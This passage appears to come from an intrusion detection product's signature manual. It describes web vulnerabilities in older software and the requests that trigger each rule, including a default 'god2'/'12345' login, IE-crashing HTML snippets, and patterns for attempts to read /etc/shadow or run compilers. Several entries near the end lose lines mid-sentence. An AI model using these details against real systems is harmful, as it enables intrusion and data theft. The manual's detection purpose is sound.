TextPortal Undocumented Username / Password Weakness
Signature Description: TextPortal is a text-based PHP portal system with forum, voting, user registration, etc.
TextPortal(TextPortal version 0.8 and prior) could allow a remote attacker to gain unauthorized access. TextPortal
96
encrypts passwords using crypt and stores them in the 'db_ures\admin_pass.php' file. Specifically, TextPortal uses
'12345' as the default password for the 'god2' user account. If the Administrator fails to change the default password of
the "god2" account, a remote attacker could send a specially-crafted URL to the admin.php script to gain unauthorized
access to TextPortal. No remedy available as of September, 2008.
Signature ID: 656
Cafelog gm-2-b2.php remote command execution vulnerability
Signature Description: CafeLog b2 WebLog tool allows users to generate new pages and weblogs dynamically. b2(b2
version 0.6.1) could allow a remote attacker to include malicious PHP files. A remote attacker could send a speciallycrafted URL request to the gm-2-b2.php script in the b2-tools directory that uses the $b2inc variable to specify a
malicious PHP file on a remote system, an attacker may exploit this vulnerability to execute arbitrary code on the
vulnerable system. No remedy available as of September, 2008.
Signature ID: 658
Webfroot Shoutbox URI Parameter File Disclosure Vulnerability
Signature Description: Webfroot Shoutbox is a web application designed to allow web site visitors a chance to leave
messages quickly and easily. Shoutbox(Webfroot Shoutbox version 2.32 and prior) is prone to directory traversal
attacks. A remote attacker could send a specially-crafted URL request to the shoutbox.php script containing "dot dot"
sequences(../) as the value for the $conf variable to traverse directories. An attacker can exploit this vulnerability to
obtain any files on the Web server. No remedy available as of September, 2008.
Signature ID: 659
WEB-PHP p-news.php access vulnerability
Signature Description: P-News(P-News version 1.16 and prior) is prone to a remote file-include vulnerability. A
remote attacker could send a specially-crafted URL request to the p-news.php script using the pn_lang parameter to
specify a malicious file from a remote system. An attacker can use this vulnerability to execute arbitrary server-side
script code on an affected computer with the privileges of the web server process. No remedy available as of
September, 2008.
Signature ID: 661
Mambo upload.php access vulnerability
Signature Description: Mambo is a Content Management System(CMS). It is the engine behind your website that
simplifies the creation, management, and sharing of content. Mambo Site server(Mambo Site Server version 4.0.12b
and prior) could allow a remote attacker to upload malicious PHP files. A remote attacker could send a speciallycrafted URL request containing a malicious PHP file to the upload.php script. Specially, the script only checks to see
whether certain image extensions, such as '.jpg' and '.gif', exist in the file name. As such any file that include the
allowed extensions may be uploaded. Any uploaded files will be stored in the 'images/stories' directory on the system.
An attacker can exploit this vulnerability to upload malicious applications to the vulnerable system. No remedy
available as of July, 2008.
97
Signature ID: 662
Mambo uploadimage.php access vulnerability
Signature Description: Mambo is a Content Management System(CMS). It is the engine behind your website that
simplifies the creation, management, and sharing of content. Mambo Site server(Mambo Site Server version 4.0.12b
and prior) could allow a remote attacker to upload malicious PHP files. A remote attacker could send a speciallycrafted URL request containing a malicious PHP file to the uploadimage.php script. Specially, the script only checks to
see whether certain image extensions, such as '.jpg' and '.gif', exist in the file name. As such any file that include the
allowed extensions may be uploaded. Any uploaded files will be stored in the 'images/stories' directory on the system.
An attacker can exploit this vulnerability to upload malicious applications to the vulnerable system. No remedy
available as of July, 2008.
Signature ID: 665
HTTP Client - Novarg Worm
Signature Description: The Novarg worm infects systems through email attachments and p2p file sharing. The targets
are all win32 computers. Once infected the worm installs a backdoor, allowing an attacker remote access to the
system.This signature will be triggered when infected systems attempt the DoS attack against sco site.
Signature ID: 668
PHPBB2 Image Tag HTML Injection Vulnerability
Signature Description: A cross-site scripting vulnerability is caused by the failure of a site to validate user input before
returning it to the client's web-browser. The essence of cross-site scripting is that an intruder causes a legitimate web
server to send a page to a victim's browser that contains malicious script or HTML of the intruder's choosing. The
malicious script runs with the privileges of a legitimate script originating from the legitimate web server. This rule tries
to detect a possible attempt to cross-site scripting using img HTML tag. The Affected version of PHPBB is 2.0 RC-4
and prior. The issue is fixed in the version of PHPBB 2.0.1 or later.
Signature ID: 669
XSS to steal cookies vulnerability
Signature Description: The rule tries to detect a possible attempt to XSS. The rule is triggered when 1) an attacker is
trying to send some data (eg., malicious script) to the web site, so that other users can access the data. in this way, the
attacker can steal the cookies from the other users. This type of the attack is called "cross site scripting" (XSS) attack.
2) a user is accessing a web site, which has already been compromised by some attacker by inserting some malicious
script.
Signature ID: 671
A possible attempt to crash IE 6 using code <table datasrc=".">
Signature Description: The rule tries to detect a possible attempt to crash IE 6. The rule is triggered when a user is
accessing a web site, which has already been compromised by some attacker and the resulting page contains html
contents (pages) like <table datasrc=".">. When IE tries to open such a page, it crashes. This rule also tries to detect a
possible attempt to insert a malicious html code in a page which is writable from outside .i.e any feedback or posting
etc. The resulting page, which contains that code crashes IE 6.
98
Signature ID: 673
A possible attempt to crash IE 6 using code <acronym><dd><h5>
Signature Description: The rule tries to detect a possible attempt to crash IE 6. The rule is triggered when a user is
accessing a web site, which has already been compromised by some attacker and the resulting page contains html
contents (pages) like <acronym><dd><h5><applet></caption></applet><li></h1>. When IE tries to open such a page,
it crashes. This rule also tries to detect a possible attempt to insert a malicious html code in a page which is writable
from outside .i.e any feedback or posting etc. The resulting page, which contains that code crashes IE 6.
Signature ID: 675
A possible attempt to SQL injection (1)
Signature Description: SQL injection is a type of security exploit in which the attacker adds Structured Query
Language(SQL) code to a Web form input box to gain access to resources or make changes to data. This rule is
triggered when an attacker is accessing the inside web site to insert some malicious characters (for example, by filling
"feedback") to trigger SQL injection attack.
Signature ID: 676
A possible attempt to SQL injection (2)
Signature Description: SQL injection is a type of security exploit in which the attacker adds Structured Query
Language(SQL) code to a Web form input box to gain access to resources or make changes to data. The rule tries to
detect a possible attempt to SQL injection. The rule is triggered when an attacker is accessing the web site to insert
some malicious characters to trigger SQL injection attack.
Signature ID: 703
W3C Jigsaw Device Name Path Disclosure Vulnerability
Signature Description: Jigsaw is a Web server produced by World Wide Web Consortium(W3C) that is designed for
the purpose of show new web protocols and other features. It is written in Java programming language. Jigsaw(Jigsaw
version 2.2.1) is a denial of service vulnerability. This rule triggers when an attacker sending a HTTP request to the
'/servlet/con' device above 30 times, an attacker can use this vulnerability to crash the DOS device. This issue is fixed
in jigsaw 2.2.1 Build 200207 or later version. Upgrade the 2.2.1 Build 20020711 or later version, available at vendor's
web site.
Signature ID: 705
PhpBB Viewtopic.PHP SQL Injection Vulnerability
Signature Description: PhpBB is a open-source bulletin board application. It is a popular Internet forum package
written in the PHP programming language. PhpBB(PhpBB version 2.0.5 and earlier) is a SQL injection vulnerability.
This rule will triggers when an attacker sending specially-crafted SQL statements to the viewtopic.php script using the
topic_id variable, an attacker can use this vulnerability to steal password hashes and gain unauthorized access to the
account. This issue is fixed in latest version of PHPBB. Update the latest version of PHPBB, available at vendor's
website.
99
Signature ID: 706
Weblogic FileServlet Show Code Vulnerability
Weblogic Server version 5.x contain a flaw that may lead to an unauthorized information disclosure vulnerability. This
issue is triggered when a user sends a request prefixed with /ConsoleHelp/, invokes FileServlet, which causes the pages
to be displayed and view the source documents under the Web document root directory. The issue is fixed in WebLogic
Server 6.0 SP2 and 6.1 SP2. The administrator advised to update the latest version of WebLogic Server 6.0 SP2 and 6.1
SP2, available at vendor's website.
Signature ID: 708
PMachine Lib.Inc.PHP Remote Include Command Execution Vulnerability
Signature Description: PMachine is a web content management system. It is available for the Unix and Linux operating
systems. PMachine version 2.2.1 could allow a remote attacker to include malicious PHP files. This rule will triggers
when an attacker could send a specially-crafted URL request to the lib.inc.php script using the ?pm_path variable that
specified a malicious PHP file, an attacker can use this vulnerability to execute arbitrary code on the vulnerable system.
No remedy available as of September, 2008.
Signature ID: 709
Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
Signature Description: Apache Tomcat is the servlet container that is used in the official Reference implementation for
the Java Servlet and JavaServer Pages technologies. Apache Tomcat version 4.0.3 is a Cross-site scripting
vulnerability. This rule will triggers when an attacker could embed malicious script within a request when using
/servlet/ mapping to invoke various servlets. The successful exploitation of vulnerable can allow an attacker to execute
arbitrary code in a victim's browser. No remedy available as of September, 2008.
Signature ID: 710
Netscape Enterprise Server Directory Indexing Vulnerability
Signature Description: Netscape Enterprise Server is a web server used to host large-scale websites. This directory is
accessible by remote or local users without any authentication. The affected version of Netscape Enterprise Server is
3.x. If Netscape Enterprise Server with Directory indexing enabled allows remote attackers to list server directories via
web publishing tags such as ?wp-ver-info and ?wp-cs-dump. An attacker can use this vulnerability to gain unauthorized
access to documents or retrieve lists of file names(such as CGI scripts).
Signature ID: 711
CacheFlow CacheOS Unresolved Domain Cross Site Scripting Vulnerability
Signature Description: CacheOS is the firmware designed and distributed with CacheFlow web cache systems.
CacheOS, version 2.1.02 and 4.1.06, is a Cross-site scripting vulnerability. The vulnerability is caused by the result
100
returned to the user when a non-existing file is requested (e.g. the result contains the JavaScript provided in the
request). The vulnerability would allow an attacker to make the server present the user with the attacker's
JavaScript/HTML code. Since the content is presented by the server, the user will give it the trust level of the server
(for example, the trust level of banks, shopping centers, etc. would usually be high).
Signature ID: 712
Linux-PAM Pam_Unix.SO Authentication Bypass Vulnerability
Signature Description: The Linux-PAM package contains Pluggable Authentication Modules. This is useful to enable
the local system administrator to choose how applications authenticate users. Linux-PAM version 0.99.7.0 is prone to
an authentication bypass vulnerability. Specifically, an error occurs in the '_unix_verify_password()' function of
'modules/pam_unix/support.c'. Accounts that have only two character password hashes in '/etc/passwd', an attacker
could exploit this vulnerability to bypass security restrictions and gain unauthorized access to the system using arbitrary
accounts. This issue is fixed in version 0.99.7.1. The administrator advise to update the latest version of LinuxPAM(0.99.7.1 or later), available at vendor's website.
Signature ID: 713
Psunami.CGI Remote Command Execution Vulnerability
Signature Description: Psunami is a CGI script that provides online bulletin board for web sites. Psunami Bulletin
Board version 0.5.2 is prone to a remote command execution vulnerability. This rule will triggers when an attacker
submit a URL request to the psunami.cgi script that contains shell code between pipe characters (|) in the topic
parameter. When the web server receives the HTTP request, it executes the code placed between the pipe characters.
Signature ID: 714
PDGSoft Shopping Cart redirect.exe/changepw.exe Buffer Overflow Vulnerability
Signature Description: PDGSoft Shopping Cart is a Web-based shopping cart system. PDGSoft version 1.50 is
vulnerable to a buffer overflow in the redirect.exe/changepw.exe script. By sending a long query string, a remote
attacker can overflow a buffer and execute arbitrary code on the system. Upgrade to latest version of the software from
vendor's website.
Signature ID: 715
Basilix Webmail Incorrect File Permissions Vulnerability
Signature Description: BasiliX is a web mail application based on a PHP and IMAP, and powered with the MySQL
database server. It has a user-friendly interface and its HTML files are easy to be changed/edited. If the web server is
not configured to recognize files with ".class" or ".inc" extension as PHP scripts, a remote attacker can send an HTTP
request to view these files, which may contain sensitive data, such as the MySQL password and user name information.
The affected version of BasiliX is 0.9.7beta. No remedy available as of July, 2008.
101
Signature ID: 717
CGIScript.net csNews Header File Type Restriction Bypass Vulnerability
Signature Description: CsNews is a script for managing news items on a website. It is used on most Unix, Linux and
Microsoft Windows operating systems. This rule will triggers when an attacker could sending a specially-crafted URL
request to the csNews.cgi script that containing double URL encoded characters to access the 'Advanced Settings' page,
once the attacker gain access to the 'Advanced Settings' page, modified values could be set using the header and footer
fields, which could allow the attacker to view arbitrary files or execute arbitrary commands. The vulnerable version of
csNews is 1.0.0. No remedy available as of September, 2008.
Signature ID: 718
Netwin CWMail Buffer Overflow Vulnerability
Signature Description: CWMail is a web-email gateway which allows to read and process new email from a web
browser running on any machine with access to the internet. CWMail version prior to 2.8 are a buffer overflow
vulnerability. This rule will triggers when an attacker sending an overly large string to the 'item=' parameter using the
forward option, a remote attacker could use this vulnerability to overflow a buffer and execute arbitrary code on the
system. The issue is fixed in the version 2.8a or later. The Administrator advised to update the latest version of
CWMail(2.8a or later), available at vendor's website.
Signature ID: 719
Trend Micro InterScan eManager register.dll Buffer Overflow Vulnerability
Signature Description: Trend Micro InterScan eManager is an application that inspects email traffic flowing into and
out of a network for confidential or inappropriate material entering and/or leaving the network. This application has the
capability to inspect, modify, and/or block email at the border of the enterprise. Trend Micro InterScan version 3.51
and 3.51J is a buffer overflow vulnerability. This rule will triggers when an attacker cold sending a long arguments to
the register.dll, an attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the system.
Signature ID: 720
Sun NetDynamics Session ID Hijacking Vulnerability
Signature Description: NetDynamics is an application server platform designed to provide a comprehensive solution
for enterprise level portal applications. The vulnerable versions of NetDynamics are 4.x through 5.x. This rule triggered
when a user logs in, the session ID remains valid for up to 15 seconds, an attacker mappings to hijack the session with
knowledge of NetDynamics command. An attacker can use this vulnerability to execute arbitrary commands on the
system with privileges of the hijacked account. No remedy available as of July, 2008.
Signature ID: 721
Nph exploitscanget.cgi access vulnerability
Bugtraq: 7911,7910,7913 Nessus: 11740
Signature Description: Infinity CGI Exploit Scanner is a web-based CGI vulnerability scanner, implemented in perl
and stored under the name 'nph-exploitscanget.cgi'. There is a flaw in this CGI which lets an attacker execute arbitrary
102
commands on this host. In addition to this, there is a flaw in this CGI which may allow an attacker to use this CGI to
scan remote web servers. This CGI is also vulnerable to cross-site scripting issues.
Signature ID: 722
AT-admin.cgi Access vulnerability
Signature Description: Excite for Web Servers(EWS) is a web server, lets visitors easily explore and search a web site
using a new generation of navigation technology. It allows Web administrators to add "smart search" capacities to their
home pages. Excite for web servers 1.1 is a vulnerable version. This rule triggered when an attacker could send a HTTP
request to the AT-admin.cgi, an attacker can use this vulnerability to gain privileges by obtaining the encrypted
password from the world-readable Architext.conf authentication file. No remedy is available.
Signature ID: 723
Ion-p Remote File Disclosure Vulnerability
Signature Description: ION Script is language that is used to create IDL-driven Web documents. On the Net(ION),
version 1.4.0, is a file disclosure vulnerability. This rule triggered when an attacker could send a specially-crafted URL
request to the 'ion-p' script using the 'page' variable, an attacker can use this vulnerability to gain required information
or download the files from the system. No remedy available as of September, 2008.
Signature ID: 724
WEB-MISC VsSetCookie.exe access vulnerability
Signature Description: VitaNet is part of Lucent's VitalSuite SP product family. It allows users to monitor, analyze,
manage and predict the performance of their network infrastructure. The affected version of VitalNet is 8.0. This rule
will triggers when an attackers to bypass authentication via a direct HTTP request to the VsSetCookie.exe program, an
attacker can use this vulnerability to gain unauthorized access to the web server.
Signature ID: 725
Talentsoft Web+ Source Code Disclosure Vulnerability
Bugtraq: 1722
Signature Description: Talentsoft Web+ is an e-commerce server designed to run under a web server, to provide web
storefronts. It allows users to read arbitrary data files on the Web server running the webpsvr daemon. The affected
version of Talentsoft Web + is 4.6. This rule will triggers when an attacker could send a request to the webplus.exe CGI
application with "?script=<name of the file>::$DATA" appended to the end of the request, an attacker can use this
vulnerability to view the source code of WML files, which may contain sensitive information, such as datasource, table
names, user names, and passwords and also retrieve the source code of other server-side scripts, such as Active Server
Pages(ASP files). The issue is fixed in the version of Web+ build 542 or later. Update this issue, which available at
vendor's web site.
Signature ID: 726
CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability
Signature Description: CGIScript.net provides various webmaster related tools. A vulnerability has been reported in
103
the csMailto.cgi script developed by CGIScript.net. csMailto is a perl script designed to support multiple mailto:forms
and also send and receive files. The script stored all the form configuration data in hidden fields in the actual form. An
attacker can use this vulnerability to execute arbitrary commands via shell metacharacters in the form-attachment field.
Signature ID: 727
Trend Micro OfficeScan cgiWebupdate.exe Disclosure Vulnerability
Signature Description: Trend Micro Office Scan is a centrally managed Antivirus solution that allows administrators to
manage virus and spyware protection in business environments. Trend Micro Office Scan(Trend Micro Office Scan
version 3.5.2 through 3.5.4) Corporate Edition could allow a remote attacker to read arbitrary files on the server, caused
by vulnerability in the cgiWebupdate.exe program. This issue is triggered when sending specially-crafted requests to
the Web management interface to read arbitrary files with IUSER privileges.
Signature ID: 728
CGIScript.net csPassword.CGI Information Disclosure Vulnerability
Industry ID: CVE-2002-0917 CVE-2002-0918 Bugtraq: 4887,4885,4886,4889
Signature Description: CGIScript.net provides various webmaster related tools. A vulnerability has been reported in
the csPassword.cgi script developed by CGIScript.net. csPassword.cgi(csPassword version 1.0) stores .htpasswd files
under the web document root, which could allow remote authenticated users to download the file and crack the
passwords of other users. Apply the appropriate patch, which is available at vendor's website.
Signature ID: 729
Brian Stanback bsguest.cgi Remote Command Execution Vulnerability
Signature Description: Bsguest.cgi is a script designed to coordinate guestbook submissions from website visitors.
Brian Stanback bsguest.cgi, version 1.0.0, is an input validation vulnerability. The issued is triggered when the script
fails to properly filter ";" characters from the user-supplied email address, could allow a remote attacker to obtaining
the system's etc/passwd file. The issue is fixed in the version 3.0 or later. The Administrator was advice to update the
latest version of bsguest.cgi(3.0 or later), which is available at vendor's website.
Signature ID: 730
TalentSoft Web+ Directory Traversal Vulnerability
Signature Description: Talentsoft Web+ is an e-commerce server designed to run under a webserver, to provide web
storefronts. It allows users to read arbitrary data files on the Web server running the webpsvr daemon. The affected
version of Talentsoft Web + is 0.0.04.x. This rule will triggers when an attacker could send a specially-crafted URL to
the webplus using 'script' variable contains ..(dotdot) sequence, an attacker can use this vulnerability to execute
arbitrary data files on the web server. This issue is fixed in the version Talentsoft Web+ build 513 or later. Update this
version for removing this issue, available at vendor's web site.
Signature ID: 731
DCForum Arbitrary cgforum.cgi Disclosure Vulnerability
104
Signature Description: DCForum is a complete web conferencing software for building and managing an online
discussion community. DCForum, version 6.0, is a denial of service vulnerability. CDForum could allow a remote
attacker to view arbitrary files on the server with the privileges of the 'nobody' user or web server. If the attacker
attempts to view the source code of the dcforum.cgi script, the script delete itself, causing a denial of service. This issue
is fixed in appropriate patch, available at vendor's web site.
Signature ID: 732
WEB-INF folder accessible vulnerability
Signature Description: The WEB-INF directory contains Java class files, detailed web application configuration
information, server side libraries, session information and files such as web.xml and webapp.properties. This rule
triggered when an attacker could send a specially-crafted URL request for a file /WEB-INF/ directory, an attacker can
use this vulnerability to retrive files located in the /WEB-INF/ directory.
Signature ID: 733
Sambar Server hello.bat Code Execution Vulnerability
Signature Description: The Sambar Server is a multi-threaded HTTP, FTP and Proxy server for Windows NT and
Windows 95. Sambar Server,4.2.0beta 7, contains a flaw that may allow a malicious user to execute arbitrary code. The
issue is triggered when additional commands are appended to a request for the "hello.bat" file. An attacker can use this
vulnerability to read, modify, create, or delete any file or directory on the system, including user accounts. The issue is
fixed in the Sambar Server version 4.3Beta 8. Update this version for removing the issue, which available at vendor's
web site.
Signature ID: 734
Vpopmail-CGIApps 'vpasswd.cgi' Remote Command Execution Vulnerability
Signature Description: Vpopmail is the virtual core of Mail::Toaster. All the user authentication, permissions, quota,
and other settings that related to email users and virtual domains is managed by vpopmail and it's collection of tools.
Vpopmail, version prior to 0.3, is a input validation vulnerability. This rule will triggers when an attacker could embed
arbitrary commands in the password form field using the semi-colon(;) in the vpopmail.cgi script. The vpopmail.cgi
script is used to change user passwords. The password is changed by calling the os.system() function. An attacker can
use this vulnerability to execute arbitrary commands on the web server. This issue is fixed in the version 0.3 or later.
Update this latest version of vpopmail-CgiApps, available at vendor's web site.
Signature ID: 735
Textcounter.pl Arbitrary Command Execution Vulnerability
Signature Description: TextCounter requires Server Side Includes and will displays a text count of the number of
visitors to a page in web site. The affected version of Testcounter is 1.2. This rule will triggers when an attacker could
send specially-crafted URL request to the testcounter.pl script containing shell metacharacters, an attacker can use this
vulnerability to execute arbitrary code on the server with privileges of the server process. The issue is fixed in 1.2.1
version. The Administrator was advice to update latest version of TextCounter(1.2.1, 1.3.1 or later), available at
vendor's web site.
105
Signature ID: 736
NetWin WebNEWS Remote Buffer Overflow Vulnerability
Signature Description: WebNEWS is a server side application which provides users with web based access to internet
News Groups. It is a compatible with any standard NNTP News server system. WebNEWS version 1.1k and prior is a
buffer overflow vulnerability. This rule will triggers when an attacker could send a specially-crafted URL request to the
webnews.exe including a string containing 1500 bytes or more in the 'group' parameter of a valid variable, a remote
attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the system. The issue is fixed in
appropriate patch, apply the available patch for removing this issue.
Signature ID: 739
WEB-CGI args.bat access vulnerability
Industry ID: CVE-1999-1180 CVE-1999-1374 Nessus: 11465
Signature Description: This rule will triggers when an attacker can send a URL request to the args.bat or the args.cmd
example file appended with shell metacharacters, an attacker can use this vulnerability to execute arbitrary commands
on the system. The affected versions of O'Reilly Web Site are 1.1e and 2.0. No remedy available as of September,
2008.
Signature ID: 740
Viralator CGI Input Validation Remote Shell Command Vulnerability
Signature Description: Viralator is Perl script that virus scans HTTP/FTP downloads request on a UNIX server after
passing through the Squid proxy server. Viralator, versions 0.7, 0.8, and 0.9pre1, is a improper filtering of usersupplied CGI parameters vulnerability. This rule will triggers when an attacker could send a specially-crafted URL
request to the viralator.cgi script containing escaped shell commands, an attacker can use this vulnerability to execute
arbitrary commands on the server. The issue is fixed in the version 0.9pre2 or later. An Administrator was advice to
update latest version of viralator(0.9pre2 or later), available at vendor's website.
Signature ID: 742
Netscape Enterprise Server REVLOG Command Access vulnerability
Signature Description: Netscape Enterprise Server is a web server used to host large-scale websites. This directory is
accessible by remote or local users without any authentication. Netscape Enterprise Server, version 3.0.0, is a denial of
service vulnerability. This rule will triggers when an attacker connect to the server and submits a specially-crafted
command 'REVLOG /HTTP/1.0', request to cause the server to crash. No remedy available as of September, 2008.
Signature ID: 743
Ceilidh textcgi.exe cross-site scripting Vulnerability
Signature Description: Ceilidh is a Web-based threaded discussion engine that features automatic text to HTML
conversion, file attachment, e-mail notification, automatic message expiration, multiple levels of security. Ceilidh
version 2.70 and prior is a cross-site scripting. This rule will triggers when an attacker could create a specially-crafted
URL request containing malicious script to the test.cgi file. When the link is clicked or a user visits a malicious
106
website, the script code will be executed in the user's browser session. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials. No remedy available as of September, 2008.
Signature ID: 745
Webadmin.dll detection vulnerability
Signature Description: WebAdmin is a web application to administer MDaemon and RelayFax. it can be run on its
own or as an ISAPI application under Microsoft Internet Information Service(IIS). WebAdmin, version prior to 2.0.3,
is a path traversal vulnerability. This rule will triggers when an attacker could send a specially-crafted URL request to
the WebAdmin.dll file, an attacker can use this vulnerability to gain unauthorized access to any file on the system. This
issue is fixed in the version 2.0.3 or later. Update this fixed version, available at vendor's web site.
Signature ID: 746
Sambar Server echo.bat Code Execution Vulnerability
Signature Description: The Sambar Server is a multi-threaded HTTP, FTP and Proxy server for Windows NT and
Windows 95. Sambar Server,4.2.0beta 7, contains a flaw that may allow a malicious user to execute arbitrary code. The
issue is triggered when additional commands are appended to a request for the "echo.bat" file. An attacker can use this
vulnerability to read, modify, create, or delete any file or directory on the system, including user accounts. The issue is
fixed in the Sambar Server version 4.3Beta 8. Update this version for removing the issue, which available at vendor's
web site.
Signature ID: 747
Oracle 9iAS PORTAL_DEMO ORG_CHART Vulnerability
Nessus: 11918
Signature Description: Oracle9i Application Server Wireless Edition (Oracle9i AS Wireless Edition) allows carriers,
enterprises, and Internet companies to wirelessly enable. In the installation of Oracle 9iAS, it is possible to access a
demo (PORTAL_DEMO.ORG_CHART) via mod_plsql. Access to these pages should be restricted, because it may be
possible to abuse this demo for SQL Injection attacks.
Signature ID: 748
Fpcount.exe Buffer Overflow Vulnerability
Signature Description: Fpcount.exe is site visit counter included with the Internet Information Server. IIS(Internet
Information Server) is a group of Internet servers(including a Web or Hypertext Transfer Protocol server and a File
Transfer Protocol server). It is developed by Microsoft. Microsoft Internet Information Server, version 4.0, is a buffer
overflow vulnerability. A vulnerability in the package could allow a user to execute arbitrary code on a running server.
The problem lies in a buffer overflow in the fpcount.exe binary. It is possible to exploit the buffer overflow in
fpcount.exe remotely, thus overwriting stack variables, including the return address.
Signature ID: 749
WEB-MISC IBM Net.Commerce orderdspc.d2w access vulnerability
Signature Description: IBM Net.Commerce enables businesses to quickly, easily, and securely conduct electronic
107
commerce on the World Wide Web. IBM Net.Commerce, version 3.1.2, could allow an attacker to gain access to
sensitive information. This issue triggered when an attacker could send a specially-crafted HTTP request to the
orderdspc.d2w macro to gain access to sensitive information in the Net.Commerce database. An attacker can use this
vulnerability to gain access to administrative accounts and user password files. The issue is fixed in the version 3.2 or
later. The administrator advice to update the latest version of IBM Net.Commerce(3.2 or later), available at vendor's
web site.
Signature ID: 750
Ad.cgi Unchecked Input Vulnerability
Signature Description: Ad.cgi is an ad rotation script freely available. Leif M. Wright's ad.cgi, version 1.0, is a
unchecked input vulnerability. This rule will triggers when an attacker could send a specially-crafted URL request to
the ad.cgi script contains a FORM variable that fails to properly check user-supplied input, an attacker can use this
vulnerability to execute arbitrary commands on the system with privileges of the Web server. No remedy available as
of September, 2008.
Signature ID: 751
Mozilla Bonsai multidiff.cgi access vulnerability
Signature Description: Mozilla Bonsai is a tool that allows a user to perform queries on the contents of a CVS archive.
Bonsai, version 1.3.0, is a path disclosure vulnerability. This rule will triggers when an attacker could send a request for
the multidiff.cgi script to cause an error message to be returned that would contain the physical path to the requested
script, an attacker can use this vulnerability to obtain sensitive information.
Signature ID: 752
Stalkerlab's Mailers 1.1.2 CGI Mail Spoofing Vulnerability
Signature Description: Stalker Lab's Mailers package for Windows NT contains the CGImail.exe program, which is
used to convert the contents of an HTML form to an email. Due to specific values in the file it is possible for a user to
save the web page to disk and modify different variables such as the $To$, $Attach$ and the $File$ variables cause the
program to send any file saved on the web server to the user, an attacker can use this vulnerability to gain access to
confidential data. The affected version of Stalkerlab Mailers 1.1.2 and later. No remedy available as of September,
2008.
Signature ID: 753
WEB-PHP readmsg.php access vulnerability
Signature Description: The Cobalt Qube was a computer server appliance product line. Cobalt Qube 3 WebMail,
version 2.0.1, is a directory traversal vulnerability in readmsg.php. This issue triggered when an attacker can send a
specially-crafted URL to the readmsg.php script containing "dot dot" sequences(/../) to traverse directories in the
mailbox parameter, an attacker can use this vulnerability to view the contents of files readable by the web server user.
108
Signature ID: 754
HTTP Client [shellscript_js.php Clientside] Vulnerability
Signature Description: HTTP (HyperText Transfer Protocol) is a stateless and object-oriented protocol standard for
distributed hypermedia systems, around which the World Wide Web is based. There is a vulnerability in Internet
Explorer. This rule triggered when an attacker could send a specially-crafted URL request to the shellscript_js.php
script, an attacker can use this vulnerability to execute arbitrary code on the web server and viewing a malicious web
page.
Signature ID: 755
HTTP Client [msits.exe Backdoor] vulnerability
Signature Description: HTTP (HyperText Transfer Protocol) is a stateless and object-oriented protocol standard for
distributed hypermedia systems, around which the World Wide Web is based. There is a vulnerability in Internet
Explorer. This rule triggered when an attacker could send a specially-crafted URL request to the msits.exe, an attacker
can use this vulnerability to execute arbitrary code on the web server and viewing a malicious web page.
Signature ID: 757
WebDAV SEARCH Overflow vulnerability
Signature Description: Web(Web-based Distributed Authoring and Versioning) is a set of extensions to the Hypertext
Transfer Protocol(HTTP) that allows users to collaboratively edit and manage files on remote World Wide Web
servers. Microsoft Windows contains a dynamic link library(DLL) named ntdll.dll. The IIS WebDAV component
utilizes ntdll.dll when processing incoming WebDAV requests. WebDAV, Microsoft IIS version 5.0, is a buffer
overflow vulnerability. The issue triggered when an attacker can send a specially-crafted HTTP long SEARCH request.
An attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the system.
Signature ID: 900
Htgroup file access vulnerability
Signature Description: The attacker tries to gain intelligence on the user and administration groups used on a web
server. The attacker could possibly gain information needed for other attacks from the .htgroup file which lists the
groups allowed to access resources on a web server. This rule will triggers when an attempt is made to send an htgroup
pattern to http web server.
Signature ID: 901
/bin/ls command web vulnerability
Signature Description: The ls command lists the files and file system layout on a UNIX or Linux based system. The
attacker could possibly gain information needed for other attacks on the host by using the ls command. This rule will
triggers when an attempt is made to send an /bin/ls pattern to http web server.
Signature ID: 903
/bin/ps command web vulnerability
Signature Description: This rule hits when /bin/sh with white space chars as %20 or + or a blank space.The ps
command lists the process status of running processes on a UNIX or Linux based system. Using "ps", the attackers
109
would check for various running system services to exploit or for the presence of security software, such as host IDS or
monitoring scripts. The attacker could possibly gain information needed for other attacks on the system. This rule will
triggers when an attempt is made to send an /bin/ps pattern to http web server.
Signature ID: 904
/etc/inetd.conf file web access vulnerability
Signature Description: The inetd configuration lists the daemons executed at boot time on a UNIX or Linux based
system. The attacker could possibly gain information needed for other attacks on the host. This rule will triggers when
an attempt is made to send an /etc/inetd.conf pattern to http web server.
Signature ID: 905
/etc/motd web access vulnerability
Signature Description: This is an attempt to gain intelligence about the system hosting a webserver. The motd is used
to display system information on a UNIX or Linux based system. The attacker could possibly gain information needed
for other attacks on the host. This rule will triggers when an attempt is made to send an /etc/motd pattern to http web
server.
Signature ID: 906
/etc/shadow web access vulnerability
Signature Description: The shadow file usually found in the /etc/ directory on UNIX based systems, contains login
information for users of a host. This file is generally used on muli-user systems to provide greater security for user
passwords. This file should only be readable by the super user. If an attacker was successful in retrieving this file, they
could then obtain valid login information for the system by using widely available password cracking tools on the file.
Logs will be generated for this signature when /etc/shadow pattern is sent to http server.
Signature ID: 907
/usr/bin/cc command web execute vulnerability
Signature Description: This is an attempt to compile a C or C++ source file on a host. The cc command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile aprogram needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when /usr/bin/cc pattern is sent to the http server.
Signature ID: 908
/usr/bin/cpp command web execute vulnerability
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when /usr/bin/cpp pattern is sent to the http server.
Signature ID: 909
/usr/bin/g++ command web execute vulnerability
Signature Description: This is an attempt to compile a C or C++ source file on a host. The g++ command is the GNU
110
will be generated for this signature when /usr/bin/g++ pattern is sent to the http server.
Signature ID: 910
/usr/bin/gcc command web execute vulnerability
Signature Description: This is an attempt to compile a C or C++ source on a host. The gcc command is the GNU
will be generated for this signature when /usr/bin/gcc pattern is sent to the http server.
Signature ID: 911
/usr/bin/id command web execute vulnerability
Signature Description: Id is a UNIX command that will return information about the system's users and groups. This
information is valuable to an attacker who can use it to plan further attacks based on the users possible login
information or be more effective in targeting specific users and groups who possess elevated privileges . The id
command will return information on the user and the users "gid" and "uid". Logs will be generated for this signature
when /usr/bin/id pattern is sent to the http server.
Signature ID: 912
/usr/bin/perl command web execute vulnerability
